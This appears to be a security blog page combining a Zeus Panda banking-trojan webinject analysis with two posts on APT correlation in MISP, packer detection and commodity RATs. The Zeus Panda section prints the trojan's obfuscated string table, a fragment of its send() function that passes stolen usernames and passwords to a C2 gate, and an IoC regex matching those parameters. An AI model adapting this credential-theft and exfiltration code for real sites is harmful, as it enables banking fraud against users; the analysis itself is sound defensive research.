We have been observing an increase in Zeus Panda infections recently. When we decrypted the config files from samples of Zeus Panda Banking Trojans that went through our processing this week, we decided to have a closer look at the current features. The low level functionality of the Zeus Panda Banking Trojan is already known quite well, so we focus our analysis on the webinjects. These webinjects are used to manipulate the functionality of the target online banking websites on the client. The one we found here was pretty interesting. As usual, the JavaScript is protected by an obfuscation layer, which substitutes string and function names using the following mapping array:

var _0x2f90 = ["", "\x64\x6F\x6E\x65", "\x63\x61\x6C\x6C\x65\x65", "\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x3F\x74\x69\x6D\x65\x3D", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65", "\x76\x65\x72", "\x46\x46", "\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72", "\x44\x4F\x4D\x43\x6F\x6E\x74\x65\x6E\x74\x4C\x6F\x61\x64\x65\x64", "\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65", "\x63\x6F\x6D\x70\x6C\x65\x74\x65", "\x6D\x73\x69\x65\x20\x36", "\x69\x6E\x64\x65\x78\x4F\x66", "\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x49\x45\x36", "\x6D\x73\x69\x65\x20\x37", "\x49\x45\x37", "\x6D\x73\x69\x65\x20\x38", "\x49\x45\x38", "\x6D\x73\x69\x65\x20\x39", "\x49\x45\x39", "\x6D\x73\x69\x65\x20\x31\x30", "\x49\x45\x31\x30", "\x66\x69\x72\x65\x66\x6F\x78", "\x4F\x54\x48\x45\x52", "\x5F\x62\x72\x6F\x77\x73\x2E\x63\x61\x70", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", "\x64\x69\x73\x70\x6C\x61\x79", "\x73\x74\x79\x6C\x65", "\x6E\x6F\x6E\x65", "\x68\x74\x6D\x6C", "\x70\x6F\x73\x69\x74\x69\x6F\x6E", "\x66\x69\x78\x65\x64", "\x74\x6F\x70", "\x30\x70\x78", "\x6C\x65\x66\x74", "\x77\x69\x64\x74\x68", "\x31\x30\x30\x25", "\x68\x65\x69\x67\x68\x74", "\x7A\x49\x6E\x64\x65\x78", "\x39\x39\x39\x39\x39\x39", "\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64", "\x23\x46\x46\x46\x46\x46\x46"];
// ... further script code ...

After deobfuscating this script, the result looks like:

var vars = ["", "done", "callee", "script", "createElement", "type", "text/javascript", "src", "?time=", "appendChild", "head", "getElementsByTagName", "ver", "FF", "addEventListener", "DOMContentLoaded", "readyState", "complete", "msie 6", "indexOf", "toLowerCase", "userAgent", "IE6", "msie 7", "IE7", "msie 8", "IE8", "msie 9", "IE9", "msie 10", "IE10", "firefox", "OTHER", "_brows.cap", "getElementById", "display", "style", "none", "html", "position", "fixed", "top", "0px", "left", "width", "100%", "height", "zIndex", "999999", "background", "#FFFFFF"];
// ... further script code ...

Taking a closer look at the now revealed functionality, we can identify the following features:

  • Browser version check, to add a browser specific event listener (e.g. for Firefox the DOMContentLoaded event is used)
  • Setting some trojan configuration variables like:
    • botid: Unique Identifier of the compromised system
    • inject: URL to load the next attack stage
  • Load and execute further target (bank) specific JavaScript code, as defined in the inject variable.

As it turns out, the first webinject stage is a generic loader to get target specific attack code from a web server. In this context ‘target’ refers to banks and payment service providers. This is not a remarkable fact in itself, as current webinjects tend to load the final attack in multiple stages. But maybe this server also includes further Zeus Panda components. So let’s take a closer look.

Target specific code and examples

After downloading the target specific second stage of the webinject, we were surprised about the actual size of the file: 91.8 KB.

A brief analysis showed a lot of functionality. Some of the functions are generic and work on every website. Others include target specific code, like specific HTML attributes. For example, the webinject uses unique id attributes to identify concrete websites of the online banking target. We are still investigating a lot of the included functionality at the time of writing. For now, we want to give a brief overview of selected parts of the basic functionality.

init_function_start
Figure 1: Flowchart of init function

After loading the target specific JavaScript, the init function shown in figure [Figure 1] is called. First, the function checks if it is on top of the page. If not, the showpage() function is called, searches for the identifier _brows.cap and deletes this DOM element if present. Otherwise the next check function are() is called, which searches for the strings “login”, “password” and “button”. If none of these strings can be found, the get() function is called to check if the user is currently logged in. This is done by checking for the presence of the logout element, which is only available when the user is currently logged in. If not, the already described showpage() function is triggered to clean up. Otherwise the status() function is used to set the status variable to the string “CP”. Afterwards the collected data is exfiltrated via the send() function, described in detail in the next section.

If all target strings were found (“login”, “password” and “button”), the next functions preventDefault() and stopPropagation() are called (left branch of figure 1). This overwrites the the default form action to collect the data the user enters into the form. Additionally the key event of the enter button (key code 13) is intercepted so that the form data is captured regardless of the submit method.

As this implementation is not working in Internet Explorer, the script checks for the presence of the cancelBubble event. If present, a specific Internet Explorer implementation is called, which provides the same functionality as the stopPropagation() function. As in the initial webinject, different code is available to support all major browsers.

After collecting form input data, the function status() is called to set the branch variable. The branch variable defines which action is triggered. In our callflow example (left branch), the value is set to the string “SL” which triggers a visible overlay of the website, indicating to the user that there is a temporary problem with the site. The following examples show two different target variations:

screen_status_sl_02
Figure 2: German example for a temporarily unavailable
screen_status_sl
Figure 3: English example of a different target

Afterwards the send() function is triggered to exfiltrate the collected data.

Exfiltration

The next interesting part in the code is the exfiltration function used during this attack stage. The collected information is handed to a function called send():
send: function () {
    var l = link.gate + '?botid=' + _tables.encode(_brows.botid) + '&hash=' + new Date() + '&bname=' + _tables.get('bank');
    for (var i = 0; i < arguments.length; i++) {
        for (key in arguments[i]) {
            l += '&' + key + '=' + _tables.encode(arguments[i][key]);
        }
    }
// ... further code ...
This function simply sets all collected data as GET Parameters and sends a HTTPS request to a PHP backend, defined in the variable link.gate. Depending on the target website, we could observe different parameters and small differences in the construction of the parameter values. The following list gives an overview of identified parameters. This list is not complete and some of the parameters are optional. All parameters are send in plain text to the C2 backend.
Paramter name
Value
botid Unique client identifier
bname Target identifier
hash Timestamp (new Date())
login1 user name
login2 user password
type module type (grabber, ats, intercepts)
param1 start
domain document.location
branch Status to trigger different functionalities
We intend to provide further details in a follow-up post. However, now we need to talk about the backend. Behold the Zeus Panda administration panel:

Admin Panel Details

The webinject code naturally led us to C2 servers and a closer analysis led us to an admin panel on one of the servers we investigated.

overview_table
Figure 4: Admin-Panel

Figure 4 displays the start screen of the Admin-Panel. Every infected machine is displayed in one row. For every entry the following information is listed:

  1. BotId: Unique identifier for the compromised system
  2. The active module type
  3. Job status of the entry
  4. Login credentials (username/password)
  5. Account status
  6. Victim IP address
  7. Timestamp of infection
  8. Browser version
  9. Target URL (bank)

The top navigation bar lists some available filters like format settings, drop zones and further configuration settings.

The panel is used by the attacker to see new victim machines and available actions. By clicking on the entries, the attacker can view detailed information about the compromised user. For example, details like the account balance of the victim, the amount available for transfer and even the transaction limit can be displayed. Furthermore the attacker can attach notes to the specific victim, to keep track of his fraudulent actions.

overwied_detailed_01
Figure 5: Admin-Panel detail view

Conclusion

Banking Trojans are still one of the most valuable sources of income for criminals online. Given the fact that this kind of malware has been developed and optimized for many years, it’s not surprising that we can observe rather a high code quality. With the Admin-Panel, the attacker has a way to manage the compromised machines without the need to know  technical infection details, making this kind of revenue stream accessible also to the technically rather illiterate.

In the follow-up blog post, we will take a closer look into target specific webinject scripts.

Indicators of compromise

Script-Stage
IoC
Functionality
1st stage SHA256: d8444c2c23e7469a518b303763edfe5fd38f9ffd11d42bfdba2663b9caf3de06 Loader
1st stage
initial webinject
_brows.botid

_brows.inject
Loader
2nd stage SHA256: a99e2d6ec2a1c5b5e59c544302aa61266bb0b7d0d76f4ebed17a3906f94c2794 Exfiltration
2nd stage
target specific
\.php\?(&?(botid|hash|bname|login1|login2|type|param1|domain|branch)=[^&]*){4,9}$ Exfiltration

Authors: Manuel Körber-Bilgard and Karsten Tellmann

The Kings In Your Castle Part 5: APT correlation and do-it-yourself threat research

Welcome back, to the fifth and last part of our blog series The Kings In Your Castle, where we aim to shed light on how A.P.T. functions, how targeted malware looks like and the issues us analysts might find on it. If you are interested on how it started, please check out the parts 1, 2, 3 and 4; namely here, here, here and here.

In part 5 now I will describe how we leveraged our gathered data for correlations, to unveil connections among targeted attacks, reported to CIRCL’s MISP instance. Furthermore, this blog looks ahead on what happened after the presentation of our proof of concept at this year’s Troopers conference in Heidelberg. Large parts of the parsing and correlation functionality has made its way into the code base of MISP. Raphael Vinot has published the MISP Workbench, where MISP users can now perform their own correlation of events found in MISP.

Corre…what?

For starters, let’s define the term “correlation”. We define this as the uncovering of links of any kind among events reported to MISP. A requirement for reports that support a correlation is that they refer to one single event which goes beyond the general information already contained in MISP. Through this correlation we can glean extended knowledge of a toolset used by an actor as well as information on target preference. We also get to know about shared tools or techniques among two or more actors. We would also count it as a successful correlation if we find proof that two supposedly related events do not share any links at all.

A big step from classical (mass-)malware detection to research and mitigation of targeted attacks was, to recognize a pattern over time. The fundamental difference between targeted and non-targeted threats is that non-targeted threats does not know and/or care about their target. While campaigns of non-targeted threats also tend to improve over time, targeted actors have a significantly more developed need to stay ahead of their victims. This way, when tracking threat actors, one might spot new additions to their toolset, new intrusion techniques or even see them picking up new “business lines”.

Also, looking at malware campaigns from a historical perspective helps uncovering false flags as well as attempts to cover their tracks. This is especially significant when looking at how actors learned to do this over time.

With all of this reasoning in mind we dug through data sets with (and, occasionally, without) structured approaches, in order to unveil hidden treasures.

Naming is hard

And frequently, when uncovering supposably unknown links among different events, we found ourselves poking at the very same group of aggressors; using the very same malware and attack methods as the linked event would show. But how come?

There are several reasons to this, the most obvious one being that two events were reported, commenting on differently named groups, but actually referring to the same. This is an old issue in threat analytics; naming is hard. The reality was that in most common cases we quickly realized that each time we had a link, we were looking at identical events that were just named differently.

Probably the most popular case of multi-naming is Havex; otherwise known as EnergeticBear, DragonFly, or CrouchingYeti. This group has been mentioned in at least four different reports, with dedicated naming on all four. Similar cases have been observed for Sakula, also called BlackVine, and for WhiteElephant, also called Seven Pointed Dagger.

5_2_naming

What we found

The purpose of correlating different events was to try and find any existing links between events that were either instigated by different actors and/or performed at different points in time by the same group. For one, we wanted to proof that we could uncover links among sample sets and groups with little technical effort. For instance, we were able to spot a spear phishing attack within MISP which clearly related to other campaigns driven by an actor known as APT1. APT1 is said to be a Chinese group, performing a plentitude of attacks in (years?). It is hugely beneficial to have advance knowledge of past attacks and current changes to an attacker’s toolset. This is especially true if an attack by a specific group against a given target may be imminent or already in progress.

What turned out interesting also though, was uncovering events documenting the same group, but extending the view to include  the capabilities which were added over time. One example for this is TurboCampaign. This was first reported in 2014. By that time it went by the name of Shell_Crew. When spotted again in 2015, they sported a 64-bit Derusbi implant for Linux machines, which had not been observed earlier. It is unclear at this point, whether this component was just missed in the 2014 report or if it was added less than a year later. The fact that attack groups learn as they go and extend their toolset is not surprising. This learning process gives us exactly the kind of information we set out to learn.

Other things we found in similar ways were for example a link between a report on The Dukes and another campaign dubbed Hammertoss; we linked an RTF spearphishing campaign from 2014 to the PittyTiger group, and we discovered a connection between RedOctober and the Inception Framework.

How to determine what’s related

We should underline again that what we did was not yet another machine learning exercise. The attributes outlined in previous episodes of this series can potentially serve in malware machine learning research, but exploring this was out of scope for what we had in mind. But what DID we do then?

We followed a rather simple approach. The set of indicators mentioned in blogpost #2, combined with attributes already present within MISP, went into a Redis backend, hosted on strong computing power. Redis allows, to perfom rather quick queries on large datasets in memory. By calculating hashes to index data items, large sets can be processed from different angles.

This way we can perform correlation runs based on IP addresses, domain names and file hashes, as well as compilation timestamps, original file names, import table and ssdeep hashes and many more. As outlined mentioned last time, targeted malware is likely to not be packed or obfuscated. It is also likely to be reused, either in its compiled form or only parts of its source code.

The following graphic illustrates a snapshot of data, related to one event within MISP. One can quickly identify certain patterns, as well as absent data. Naturally, PE-specific attributes can only be retrieved from Windows PE binaries. Help on that front is provided by ssdeep hashes, which also serve for file clustering approaches.

5_3_data

Ssdeep clustering

Ssdeep, apart from computing a piece-wise hash of a given file or data blob, is capable of measuring the distance between two or among multiple ssdeep hashes. These distances are named match scores, weighed measures of how similar two given files are to each other. This is possible because of the fact that ssdeep does not calculate cryptographical hashes, which identify the entire file, but only pieces of a file. Those can then be compared to the piecewise hash of a different file. Naturally, this method can be extended to compare multiple files to one file, and also looking into groups of files, calculating distances among all of those.

This principle allows for clustering of files, based on ssdeep hashes. The most popular implementation of ssdeep clustering, and also the one we based our toolchain on, is ssdc by Brian Wallace. As extension to the original implementation of ssdc, we added a multi-process computation module and a Redis connector, to be able to store clustering results directly to the backend.

This way we are able to spot events which are “close” to each other based on similarities within the involved binaries. With this information one could, for instance, establish that a group targeting entities within Russia, is using malware which bears disturbing similarities to malware used by a (different..?) group targeting entities within Afghanistan and Tajikistan. Just saying….

Ssdeep clustering challenges

Processing fuzzy hashes is a very resource intensive task, even more so when clustering samples of them. This doesn’t scale well for sample sets of certain sizes. Our test set is limited, but given that most malware repositories deal with a sample size within the hundred thousands or bigger, some presorting of groups of interest might be feasible. This pre-sorting of samples which match a certain set of criteria (e.g. events of within a specific timeframe, targeted platforms only geographical constraints) can speed up the clustering approach significantly.

Lastly, it’s worth mentioning that ssdeep hashes, just like any other statically retrieved attribute, only help describing the outer surface of a sample. It does not carry information about the purpose or behavior of a binary and is easily disturbed by runtime packers and might even fail its purpose after malware authors apply a simple change in their compiler settings.

Taking things further: MISP Workbench

Please note that, by now, this kind of APT research has been performed by designated threat research teams for a long time and presented techniques are not considered new. The community benefit we see here is the integration of our toolset into MISP’s open source code body, as well as providing results and conclusions to the broader public. Research of targeted attacks is difficult without access to a large malware set and high quality threat intelligence data.

So now here we are. With MISP Workbench the tools we developed and the data we gathered were integrated into the MISP platform in order to support incident responders and researchers to easily perform their own queries when investigating one or more events.

Workbench was built with the objective to incorporate all the presented features into one single tool. Also, it is intended to enhance the existing MISP dataset with a rich feature set, especially regarding the presented PE features. Workbench can now be used to easily group events by attacker tool sets; in connection with MISP Galaxy this is also possible with focus on dedicated adversaries. Workbench supports full text indexing and lookups for keywords, as well as picking through events on singular features or indicators.

Fine folks at CIRCL have built Workbench for standalone use, with a lightweight user interface. A more detailed description can be found here.

The following screenshot shows statistics about binary compilation timestamps within our targeted malware test set. One can quickly see, how 1970 and 1992 must have been very busy years for lots of malware authors. Err… kidding, of course. But it does seem obvious how compilation timestamps, or even just parts of compilation timestamps, can occasionally serve as an interesting grouping attribute.

5_3_data2

Furthermore, Workbench in combination with Galaxy, supplies information about threat actors and events linked to them. This enables the analyst to search for links among threat actors on a binary feature level.

5_3_grouping

As mentioned, the extracted PE features can be used for grouping as well. The following screenshot shows how the filename ‘chrome.exe’ seems to be an all-time favorite of The Dukes, a threat actor operating out of Russia.

5_3_orifname

Finally

And here it ends, this lengthy blog series on Kings In Your Castle. The work will continue, of course. The tools presented,  just as any information sharing platform such as MISP, live from the collective effort of contribution to the tool stack, the threat information base and the distribution chain. In that sense, questions and comments are welcome, just like pull requests, bug reports and feature ideas. At this point let me say thank you once more, to my co-sufferer Raphael Vinot, as well as the team at CIRCL, the team at ERNW and Troopers conference for letting us present our work as well as Morgan Marquis-Boire for supplying samples and ever more samples.

Happy APT hunting everyone 🙂

The Kings In Your Castle Part 4 – Packers, Crypters and a Pack of RATs

In part 4 of our series “The Kings In Your Castle”, we’re back with the question, what does sophistication even mean? I’ll be outlining what complexity from a malware analyst’s perspective means, why malware intends to be undecipherable and why it sometimes just wouldn’t even try. Also, this blog entry serves to present our findings on commodity RATs within the corpus of malware we analyzed, as part of our talk at Troopers conference in March.

If you are interested in previous parts of the series please check them out here, here and here.

What does sophistication even mean?

The complexity of software is a rather soft metric, that hasn’t undergone much scrutiny in definition. For a malware analyst, this sphere even takes on a whole lot of different shades, as malware by nature aims to hide its threats. At least most of it, as one would think?

For analysts, what poses challenges are techniques such as code obfuscation or the use of well-fortified crypters. What also presents a remarkable challenge  is structured application design, although this might sound somewhat counter-intuitive. Multi-component malware with a well thought-out object oriented design and highly dependent components cause more of a headache for an analyst than any crypter out there. In fact, many of the well-known high-profile attack toolsets aren’t protected by a packer at all. The assumption is, that for one, runtime packers potentially catch unwanted attention of security products; but also, for highly targeted attacks they might not even be necessary at all. Malware developers with sufficient dedication are very well able to hide a software’s purpose without the use of a runtime packer. So, why do we still see packed malware?

A software crypter is a piece of technology which obfuscates software and its intentions, but also to changes its appearance. Crypters and packers are frequently applied to malware in order to ensure the reusability of the actual malcode. That way, when malware is detected once, the same detection will not apply to the same malware running on a different system.

Let’s take a step back though. The ‘perfect targeted attack’ is performed with a toolset dedicated to one target only. We can conclude that a crypter is needed if either the authors aren’t capable of writing undetectable malware, or, more likely, if the malware is intended to be reused. This makes sense, if you reconsider, writing malware takes time and money, a custom attack toolset represents an actual (and quite substantial) investment.

Finally, with economical aspects in mind, we can conclude that attacks performed with plain tools are the more expensive ones, while attacks using packers and crypters to protect malware are less resource intensive.

4_1_sophistication

The actual hypothesis we had started our research with was, that most targeted malware comes without a crypter. In more detail, we put up the statement, that targeted malware was significantly less protected than random malicious software. Again, random malware doesn’t know its target and by definition is intended to infect a large number of individuals; while targeted malware supposedly is designed for a limited number of targets.

Packer Detection (Like PEiD Was Broken)

Now, the usage statistics of runtime packers and crypers would be easy to gather from our respective dataset, if the available state-of-the-art packer detection tools weren’t stuck somewhere in 1997. The question whether a file is packed or not in practice is not trivially answered. One of the tools that is frequently used to identify packers is named PEiD. PEiD applies pre-defined signatures to the first code bytes starting from the executable entry point, which easily fails if the code at the packed binary’s entry point changes only slightly.

Aiming for more accurate results, we decided to come up with our own packer evaluation. We put together a set of indicators for abnormal binary structures, which are frequently seen in relation with runtime packers. Please note, the indicators are just that – indicators. The evaluation algorithm leaves some space for discrepancies. In practice though, manual analysis of randomly picked samples has proven the evaluation to be reasonably precise.

We gathered the following PE attributes:

  • Section count smaller than 3
  • Count of TLS sections bigger than 0
  • No imphash value present, thus import section empty or not parseable
  • Entropy value of code section smaller than 6.0 or bigger than 6.7
  • Entry point located in section which is not named ‘.text’, ‘.itext’ or ‘.CODE’
  • Ratio of Windows API calls to file size smaller than 0.1

Of course, no single one of the gathered attributes is a surefire indicator in a packer evaluation process. In reality, some of the mentioned presumed anomalies are frequently seen within unpacked binaries, and depend, for example, on the executable’s compiler. Nevertheless, any of the mentioned features is reason enough to grow suspicion, and as mentioned before, the evaluation works rather reliably on our chosen dataset.

According to our algorithm the values weigh into an evaluation score, based on the final score an analyst can then draw his conclusion. It is worth noting at this point, that the chosen thresholds are quite sensitive, and one would expect to rather detect too many “potentially-packed” samples, instead of too few.

Further details about our packer evaluation method can be found within the published code.

The results can be found in the following charts, showing the evaluation values in relation with sample counts. The maximum score a sample can reach on our scale is 220, meaning that all eval attributes exceed the chosen threshold. The following graphics show the evaluation performed on a benign sample set, on a targeted malware sample set and on a random malware sample set. Attention should be paid to the sample frequency count on the y-pane of the graph.

benign
The benign set
targeted
The targeted malware set
random
The random malware set

The graphs show very well, how roughly a third of the benign samples show low rated indicators; while for the random malware sample set, it is less than a third of the overall set showing no indicators, while more than a third of the set show remarkably high rated indicators. It shall be mentioned, that a look into benign samples rated at 40-50 resulted in the finding, that most of them were packed with UPX, a binary packer used mainly for binary compression.

The remarkable bit at this point is that the set of targeted malware binaries has the overall lowest count of packer indicators. This leaves us with two possible conclusions. Following our hypothesis that targeted malware is significantly less protected by crypters than random malware, we take this result as a proof.

On the other hand, what surely biases the result, is that the chosen attributes are potentially influenced by compilers used to compile the given binaries. This means though, as the results for the targeted set are notably homogenous, that the larger part of targeted malware within our dataset has probably not experienced exotic compilers either. As a research idea for future analysis I’d like to put up the somewhat far-fetched hypothesi, that most targeted malware is written in C/C++ and compiled using Visual Studio compiler. Curious, anyone?

Commodity RATs

Taking the question of malware sophistication further, in the past the analysis community was frequently astonished in the light of yet another incredibly complex targeted malware campaign. While it is true that certain targets require a high level of attack sophistication, most campaigns do not require components for proprietary systems or extremely stealthy methods. An interesting case of high profile attacks being carried out with commodity malware was uncovered last year, when CitizenLab published their report about Packrat. Packrat is a South American threat actor, who has been active for around seven years, performing targeted espionage and disinformation campaigns in various South American countries. The actor is most known for targeting, among others, Alberto Nisman, the late Argentinean prosecutor, raising a case against the Argentinean government in 2015.

Whoever is responsible for said campaigns did have a clear image of whom to target. The actor certainly possessed sufficient personal and financial resources, yet made a conscious decision to not invest in a high-end toolchain. Looking into the malware set used by Packrat, one finds a list of so called commodity RATs, off-the-shelf malware used for remote access and espionage. The list of RATs includes CyberGate, XTremeRAT and AlienSpy; those tools themselves are well-known malware families associated with espionage.

Again, using repackaged commodity RATs is notably cheaper than writing custom malware. The key to to remaining stealthy in this case is the usage of crypters and packers. In the end though, by not burning resources on a custom toolchain, the attacker can apply his resources otherwise – potentially even on increasing his target count.

Hunting down a RAT pack

Looking at the above facts, one question emerges: how prevalent are pre-built RATs within the analysis set at all? To establish a count for commodity RATs count we again relied on detection names of Microsoft Defender. The anti-virus solution from Microsoft has shown in the past to be rather slow in picking up new detections, while providing quite accurate results once detections are deployed to the engines. Accuracy at this point includes certain reliability when it comes to naming malware.

For evaluation, we chose to search for the following list of commodity malware:

  • DarkComet (Fynloski)
  • BlackShades (njRat, Bladabindi)
  • Adwind
  • PlugX
  • PoisonIvy (Poison)
  • XTremeRAT (Xtrat)
  • Handpicked RAT binaries

The selected set is what we noted seeing when going through the malware corpus manually, please note though, the list of existing commodity RATs is by far longer.

The so to say “lazy king of APTing” is PlugX. The commodity RAT popped up in all together 15 different events listed in the MISP database.

4_2_plugx

The winner in sample numbers was Adwind, a Java based RAT, dedicated to infect different platforms. Adwind itself is malware, that has been sold under different names, including Frutas RAT and Unrecom RAT. Security firm Fidelis published nice insights on Adwind, under the much appreciated title “RAT in a jar”.

The following graphic shows the total number of RATs and related events, found within our data set of 326 events containing 8.927 malware binaries.

4_3_ratpack

In total, we counted that almost a quarter of inspected events made use of one or another RAT. Looking at the sample set, 1/9th of the total set is composed of pre-built RATs. These numbers are rather high, considering that, at least in the heads of analysts, targeted malware is complex and sophisticated.

Still, though, why do we even bother with high numbers of commodity malware? For one, as mentioned before, they help driving down attack cost. Furthermore, they provide functionality that is quite advanced from the beginning, equipping even unskilled attackers with a Swiss Army Knife of malware they couldn’t implement themselves, even if they tried really hard. These do-it-yourself APT tools enable wannabe spies with little budgets, growing the number of potential offenders.

Furthermore, off-the-shelf RATs have been seen in use by certain advanced attackers. They could lead to confusion about the actual offender, as they do not allow for attribution on the base of the binaries at all. In other words, one would not know whether he is being targeted by a script kiddie or a nation state actor. Currently, it remains unclear whether commodity RATs have been used in an attribution concealment approach, but the assumption does lie close.